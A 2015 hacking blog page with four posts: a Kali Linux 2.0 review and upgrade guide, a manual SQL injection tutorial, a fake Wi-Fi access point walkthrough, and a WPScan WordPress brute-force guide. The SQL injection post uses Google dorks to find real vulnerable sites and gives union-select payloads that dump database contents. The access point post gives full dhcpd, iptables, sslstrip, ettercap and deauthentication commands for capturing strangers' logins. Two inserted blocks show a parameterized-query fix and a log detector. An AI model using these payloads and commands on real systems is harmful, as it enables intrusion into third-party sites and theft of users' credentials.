Wednesday 16 September 2015

Improved Features Of New Kali Linux 2.0 And How To Upgrade To It



Kali 2.0 (Kali Sana) was released last week which means that we get to spend some time sifting through Offensive Security‘s latest release looking at all the new tools and tricks. Offensive Security promised us a better, more powerful penetration testing platform, and my preliminary look at 2.0 shows that they delivered.

Here is my previous article about Kali Linux 1.0:
An Introduction To Hacker's OS: Kali Linux Setup Tutorial

Kali Linux 2.0 (Kali Sana) is the best penetration testing distribution: well organized, with the core tools and packages a pentester needs to get started right after installation. Kali Linux 2.0 will be a rolling distribution, with updates pulled continuously from Debian testing. Kali 2.0 is based on Debian 8 and is available in lots of flavors; it natively supports desktop environments such as Xfce, GNOME 3, KDE, MATE, LXDE, etc.

The Look Of Kali Linux 2.0



Kali 2.0 switched over to the GNOME 3 interface, which brings a much needed update to the user experience. This new UI gives you a customizable favorites bar, which will certainly come in handy, having your common tools at the ready at all times. The new Applications menu in the top bar comes with new, easier-to-understand groupings. This is wonderful if you'd like to have a quick glance at all of your available applications.

Better still, Kali 2.0 also natively supports KDE, Xfce, MATE, e17, lxde and i3wm so if you’re not a fan of the default, you can switch fairly easily to one that you’re more fond of.

The Tools


Kali 2.0 includes a variety of previously-unavailable-by-default tools, including Maltego, Responder from SpiderLabs, and a slew of wireless penetration testing tools. All of these and more are accessible through the multi-level navigation mentioned previously.

The Updates


One of my personal concerns with the previous version of Kali was that updates weren’t frequent enough and tools weren’t updated as often as they should. Kali 2.0 is now a rolling distribution, meaning more updates to both the operating system and the natively supported tools.

Improved Features of Kali Linux 2.0


This version of Kali Linux was highly anticipated around the world, because the teaser released by OPSC about this project went viral on the internet. It was a 3.13-minute teaser describing the new features added to version 2.0 of Kali Linux. Let's look briefly at the new features added in this version.

1. Multi-Tasking :


Screenshot: multi-tasking feature seen at the right side of the desktop.

This is the best feature of Kali Linux v2.0 that I wish to mention here. It has a multi-tasking feature like Android's. The bitter truth is that the multi-tasking in Kali Linux v2.0 is better than multi-tasking in Android. It lets the user run 10+ programs at once. How well this feature works depends on the hardware of the system. Although it has multi-tasking, making it perfect needs a good computer or laptop with better specifications. Otherwise it may stop responding and lead to applications being force-closed. Whenever the usage of any feature exceeds what the hardware can handle, it leads to force closes. This is common to all operating systems.

2. Redesigned User Interface :



However powerful the operating system is, the interface and display give the user a sense of the exploit. Kali Linux always gives us that feel. This version has a redesigned user interface, which gives us a streamlined working experience. The user interface of this version is really awesome and provides a smooth exploiting experience.

3. Restructured Menu and Tool Categories:



This adds beauty to this new version of Linux. Not only beauty, but also the feel of penetration testing.

4. Weekly Upstream Updates of Core Toolsets:



Users can update either manually or automatically.

5. Native Ruby 2.0 Faster Metasploit Load Times :



Metasploit is one of the best tools used in Kali Linux. Considering how much Metasploit is used, the makers of this Linux gave more importance to its performance. They fixed minor bugs and made Metasploit a better tool for penetration testing.

6. Built in Desktop Notifications :


This is also one of the best features found in this version. Users don't have to install any secondary software or frameworks to get desktop notifications, as they come built into the operating system. As in Android, this version has notifications that can be enabled or disabled by the user, so they are customizable. Together with the multi-tasking feature, it gives on-time notifications so that the user won't miss anything important. The user gets a notification whenever a process is started, completed, updated or changed.

7. Built in screen casting :


Users of this penetration testing system do not have to depend on secondary software for screen recording, as screencasting has become a built-in feature. This is a nice move by the Kali Linux team. Most of these features are the same as in Android. It is worth noting that Android is Linux based. The screencasting, notification and multi-tasking features in particular show that they were modelled on the features of the Android operating system.

8. Cutting Edge Wireless Penetration Testing Tools :



New wireless penetration testing tools were also included in this new version of Kali Linux. These tools run in the terminal emulator. Their main focus is wireless penetration testing. Note that wireless is different from remote. These tools are used for Wi-Fi cracking, spoofing, sniffing, and other MITM attacks. This has made wireless penetration testing a lot easier than before.

How to upgrade to Kali Linux 2.0 (Kali Sana)


Some of you are still using Kali Linux 1.x and want to upgrade to Kali Linux 2.0 without a full clean installation. This can be done, though the recommended way of getting Kali Linux 2.0 running smoothly is to perform a full clean installation.

To upgrade to Kali Linux 2.0, you'll have to add Kali Sana repositories to your sources.list file, please don't append the kali sana repos, just overwrite existing repositories.

To do this just paste the following lines on your terminal:

cat << EOF > /etc/apt/sources.list
# Regular Repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
EOF

After adding the repos, the next step is a system update and dist-upgrade. Type the following in the terminal:
sudo apt-get clean
sudo apt-get update
sudo apt-get dist-upgrade
sudo reboot

If you want to do a fresh installation, head to download page:
Download Kali Linux ISO image

Then get the version of Kali Linux 2.0 that you need. Create a bootable flash drive using the dd command; an example is shown below:
dd if=/home/jose/Downloads/kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=512k

Replace the if= value with the location of your Kali Linux ISO image. The of option is the output file and specifies the destination to write to, e.g. /dev/sdb in our case above.

You can use the following command to know your flash drive mount location
sudo fdisk -l

You'll get output similar to one below:


If you are a Windows user, download win32diskimager, install it and create a bootable flash disk. You can also make a bootable DVD and boot Kali off it.

Final words


Basically, Offensive Security did a bang-up job upgrading the look and feel of Kali to something more modern and usable. I moved away from Kali 1.0 over the course of its life-cycle due to update and compatibility issues. Of course, as a pentester, logging in and opening a terminal minimizes the importance of the shiny UI (but it is a pretty nice upgrade). Thankfully, regular updates for both the tools and the operating systems are going to be pushed, and for the time being, I will be using Kali 2.0 as my main pentesting platform.

Tuesday 15 September 2015

Manual SQL Injection - Basic Tutorial For Hack A Website


In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on 
How to Hack Website Using Sql Map in Kali Linux - Sql Injection

Finding A Vulnerable Website


The first step is obviously finding a vulnerable website. There are a lot of ways to do so; the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.
inurl:"products.php?prodID="

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs Google to look at the URLs in its search index and provide us with the ones which have a specific string in them. Inside the inverted commas is the specific URL fragment which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses a SQL database. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a SQL injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities


Now let's assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is put a single quote (') at the end of the URL instead of 25. The URL would look somewhat like this: www.site.com/products.php?prodID='
If you are lucky, then the site would be vulnerable. If it is, then there would be some kind of error showing up, containing words like "Not found", "Table", "Database", "Row", "Column", "Sql", "MySQL" or anything related to a database. In some cases there would be no error, but there would be some berserk/unexpected behavior on the page, like a few components not showing up properly, etc.

Screenshot: a typical error message.

But right now you only know that the site is vulnerable. You still have to find which columns/rows are vulnerable.

Finding number of columns/rows


Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original URL. If there is at least one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Let's assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things

  • The site is vulnerable to SQL injection
  • It has 5 columns

Now you need to know which of the columns is vulnerable

Finding Vulnerable columns


Now let's assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. To find them, enter the following into the URL:

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - in front of the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.

Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.
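To show why the order by probing and the -1 union trick behave as described above, and what the fix looks like, here is an added example that is not part of the original post: the same inputs are run against a constructed SQLite products table, once through a vulnerable string-concatenated query and once through the parameterized query that closes the hole. Table contents are made up, and sqlite_version() stands in for MySQL's @@version.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the tutorial's products table (rows are made up)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "Widget", "9.99"), (25, "Gadget", "19.99")])
    return con


def lookup_vulnerable(con, prod_id):
    """The bug the tutorial exploits: the raw query-string value is glued into the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE id=" + prod_id
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        # A database error like this is exactly what the "order by N" probing looks for.
        return [("ERROR", str(err), None)]


def lookup_parameterized(con, prod_id):
    """The fix: validate the type, then bind the value as data so it is never parsed as SQL."""
    try:
        pid = int(prod_id)
    except ValueError:
        return []  # "25 order by 4" or "-1 union select ..." are not product ids
    return con.execute("SELECT id, name, price FROM products WHERE id=?", (pid,)).fetchall()


def demo():
    """Run the tutorial's probes through both lookups; returns {probe: (vulnerable, safe)}."""
    con = make_db()
    probes = [
        "25",                                   # normal request
        "25 order by 3",                        # 3 columns exist: works
        "25 order by 4",                        # 4th column does not: error reveals the count
        "25 union select 1,2,3",                # real row plus marker row: marker may be hidden
        "-1 union select 1,2,3",                # no real row, so the marker row is all that shows
        "-1 union select 1,sqlite_version(),3", # the @@version step
    ]
    return {p: (lookup_vulnerable(con, p), lookup_parameterized(con, p)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, safe) in demo().items():
        print(f"{probe!r:42} vulnerable -> {vuln}")
        print(f"{'':42} parameterized -> {safe}")
```

With id=25 the union returns two rows and a template that renders only the first can hide the marker, which is why the post's minus sign matters; the parameterized version returns nothing for every probe.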

Unification


From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. 


The actual vulnerability is here: http://testphp.vulnweb.com/listproducts.php?cat=1

Notice that the URL has the structure that you now know well. If used properly, a Google dork could have led us to this site as well. Now we will replace the 1 with a single quote (').


This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

Screenshot (order by 10): 10 columns, nothing so far.

Screenshot (order by 12): 12 columns, error.

So there was an error on the 12th column. This means there were 11 columns in total. So to find the vulnerable column, we have to execute:
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 

Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-


Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that the 11th column is the vulnerable one. These kinds of deductions make hacking very interesting and remind you it's more about logic and creativity than about learning up useless code.

Now we are finally back where we left off before we changed our stream. We need to find the SQL version. It can sometimes be very tricky, but let's hope it's not in this case.

Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like


The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.

And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database


Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.

In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables

The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables


As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables


We now have the names of all the tables. Here it is - 

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL

As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like 
+from+information_schema.tables+where+table_schema=database()

Obtaining columns


It is similar to obtaining tables, other than the fact that we will use information_schema.columns instead of information_schema.tables, and get multiple columns instead of just one using the same group_concat. We will also have to specify which table to use, in hex. We will use the table EVENTS (I've highlighted it above too). In hex its code is 4556454e5453 (you can use a text-to-hex converter; also prefix 0x before the code when entering it). The final code will be:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

Screenshot: we now know the columns of the EVENTS table.

Extracting data from columns


We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Let's assume we want the data from the first column in the above pic, i.e. event_catalog. We will use the following URL:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS 

Screenshot: the page didn't display properly; this means that our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

Screenshot: this table has a lot of data, and we have all the character set names.
So finally now you have data from the CHARACTER_SET_NAME column of the CHARACTER_SETS table. In a similar manner you can go through other tables and columns. It will definitely be more interesting to look through a table whose name sounds like 'USERS' and whose columns are named 'USERNAME' and 'PASSWORD'. I will show you how to organize results in a slightly better way and display multiple columns at once. This query will return the data from 4 columns, separated by a colon (:), whose hex code is 0x3a.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS


Finally you have successfully conducted a SQL injection attack in the hardest possible way, without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.


Sunday 13 September 2015

Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins


We'll be setting up a fake access point where we'll be stripping the encryption of sites using HTTPS down to HTTP so we can grab the inputs of the username and password fields. We'll also be sending deauthentication packets to all other routers nearby, rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as "waterhole attacks", where you attack a company and the employees don't even notice they are on a malicious AP, because their devices automatically connected to it after the other ones were shut down.

Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)

Requirements and Lab:



Step 1: Get our default gateway


Open up a Kali Linux terminal. You may do this by typing:

route -n

Under where it says "Gateway", you'll need to memorize it or write it down as we'll need to use it when we set our IP tables up later on.


Step 2: Now let's install DHCP3-server


Firstly, if you haven't done so already, type:

apt-get dist-upgrade
When that is done, now let's install DHCP server by typing:

apt-get install dhcp3-server
Now when it's done installing, we need to configure the DHCP server by typing:

nano /etc/dhcpd.conf
Now, copy and paste the following in:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
  option routers 192.168.1.1;
  option subnet-mask 255.255.255.0;
  option domain-name "freewifi";
  option domain-name-servers 192.168.1.1;
  range 192.168.1.2 192.168.1.40;
}

The only thing you'll need to understand here is the Option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I'll just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.

Step 3: Now let's begin monitor mode


To begin monitor mode, type:

airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:

airmon-ng check kill

Step 4: Begin the fake access point


Now that you have monitor mode all set up, now let's begin the fake access point:

airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have begun the fake AP; however, if you attempt to access it, you won't be able to yet. Remember not to close that terminal, as it keeps the AP online.

Step 5: Now let's set up the IP table rules


There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:

nano iptables.sh
Assuming you have basic knowledge of networking, I expect you'll read over this and manually adjust some of it, as parts of it might not work for you.

#!/bin/sh
clear
# give the airbase-ng interface the gateway address used in dhcpd.conf
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
# forward traffic between at0 and the uplink
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to-destination <GATEWAY IP HERE>
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
# send plain HTTP to the port sslstrip listens on (see Step 7)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Then give it permissions by typing:

chmod +x iptables.sh
Then just run it by typing:

./iptables.sh

Step 6: Starting the DHCP server


To do this, simply type in:

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
Then to start it, type:

/etc/init.d/isc-dhcp-server start

Step 7: Starting SSLSTRIP and Ettercap


I suggest you to read my previous tutorial about Ettercap: Man In The Middle Attack Using Ettercap In Kali Linux

I assume you know what both of these tools are doing, so let's start of by starting SSLSTRIP:

sslstrip -f -p -k 10000
Leave that terminal open. Then to begin ettercap, type:

ettercap -p -u -T -q -i at0

Step 8: Sending Deauth packets to all other routers


Firstly, begin scanning for the routers by typing:

airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:

iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:

aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one
Congrats, you are done. Now just sit back and wait for the users to log in and gather their data.

Credits: queryFrequency

Saturday 12 September 2015

Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool


As a WordPress administrator or webmaster you are responsible for the security of the WordPress blog or website you manage. Most probably you've already done a lot to beef up the security, and today we will show you how to brute force a WordPress password in Kali Linux using WPScan, to check your password strength.

Disclaimer: This tutorial is for educational purposes only and we are NOT responsible in any way for how this information is used, use it at your own risk.



As we know, WPScan is a black box WordPress vulnerability scanner, and it is installed by default in Kali Linux, so we will use it for brute forcing WordPress. If you have no idea about Kali Linux then I recommend you read this article: An Introduction To Hacker's OS: Kali Linux Setup Tutorial.

We will use the WordPress platform that we already installed in our Kali Linux. If you have not already done so, visit our article: Complete Guide To Setup Wordpress In Kali Linux With Xampp Server.



Let's start:


  • Open your Kali Linux Terminal and start Xampp server by typing the following command:
root@kali: /opt/lampp/lampp start

  • Now we need to enumerate users; type in the terminal:
root@kali: wpscan -u 127.0.0.1/wordpress --enumerate u



  • Wpscan will automatically search the admin username.


  • Now run a wordlist password brute force against the username; type in the terminal:

root@kali: wpscan --url 127.0.0.1/wordpress --wordlist /root/pass --username k4linux



  • --wordlist set the location of your Password Wordlist

  • --username set the administrator username that you have found



After a search WPScan will find the password; this will take a few minutes, depending on your wordlist.

The efficiency of the brute force depends on how strong your wordlist is and how many passwords it contains.
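For the administrator on the receiving end, here is an added example (not from this blog or from the WPScan project) of a log check that flags both patterns described on this page: the probe sequence from the manual SQL injection post (quote test, order by counting, union select marker, information_schema/@@version reads) walked by one client against listproducts.php, and the burst of POSTs to wp-login.php that a WPScan wordlist run produces. The access-log lines and IP addresses are constructed, and the ten-requests-per-minute threshold is an assumption to tune for your site.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed common-log-format lines (documentation IP ranges). The first client walks
# the manual SQLi probe sequence against listproducts.php; the last one hammers wp-login.php.
SAMPLE_LOG = (
    '203.0.113.7 - - [15/Sep/2015:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:05 +0000] "GET /listproducts.php?cat=1\' HTTP/1.1" 500 310\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:09 +0000] "GET /listproducts.php?cat=1+order+by+10 HTTP/1.1" 200 5120\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:12 +0000] "GET /listproducts.php?cat=1+order+by+12 HTTP/1.1" 500 310\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:20 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 HTTP/1.1" 200 4801\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:31 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,%40%40version HTTP/1.1" 200 4810\n'
    '203.0.113.7 - - [15/Sep/2015:10:00:40 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables HTTP/1.1" 200 6200\n'
    '198.51.100.4 - - [15/Sep/2015:10:01:00 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5100\n'
    + "".join(
        f'198.51.100.9 - - [15/Sep/2015:10:02:{i:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2800\n'
        for i in range(25)
    )
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Probe stages in the order the tutorial performs them, matched on the URL-decoded, lower-cased path.
SQLI_STAGES = [
    ("quote_probe", re.compile(r"=[^&]*'")),                       # prodID=' to provoke a DB error
    ("column_count", re.compile(r"\border\s+by\s+\d+")),           # order by N until it errors
    ("union_marker", re.compile(r"\bunion\s+(all\s+)?select\b")),  # union select 1,2,3,...
    ("schema_read", re.compile(r"information_schema|@@version")),  # table/column/version reads
]


def parse(log_text):
    """Yield (ip, timestamp, method, decoded path, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing on them
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["method"], unquote_plus(m["path"]), int(m["status"])


def sqli_stages(path):
    """Return the probe stages a decoded request path matches."""
    low = path.lower()
    return [name for name, rx in SQLI_STAGES if rx.search(low)]


def max_in_window(times, window_seconds):
    """Largest number of events falling inside any interval of window_seconds."""
    times = sorted(times)
    best = start = 0
    for i, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, i - start + 1)
    return best


def analyze(log_text, wp_threshold=10, window_seconds=60):
    """Flag clients walking the SQLi probe sequence and clients brute-forcing wp-login.php."""
    stages_by_ip = defaultdict(list)
    logins_by_ip = defaultdict(list)
    for ip, ts, method, path, _status in parse(log_text):
        for stage in sqli_stages(path):
            if stage not in stages_by_ip[ip]:
                stages_by_ip[ip].append(stage)  # first-seen order, no repeats
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            logins_by_ip[ip].append(ts)
    bursts = {ip: max_in_window(t, window_seconds) for ip, t in logins_by_ip.items()}
    return {
        "sqli": {ip: s for ip, s in stages_by_ip.items() if s},
        "wp_bruteforce": {ip: n for ip, n in bursts.items() if n >= wp_threshold},
    }


if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        for ip, detail in hits.items():
            print(f"{kind}: {ip} -> {detail}")
```

A client that reaches the union_marker or schema_read stage, or exceeds the wp-login.php threshold, is a candidate for blocking at the web server or firewall; the 500 responses on the probe lines are the error messages the tutorial relies on, so fixing the query (parameterization) and suppressing verbose errors removes the signal the attacker reads.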

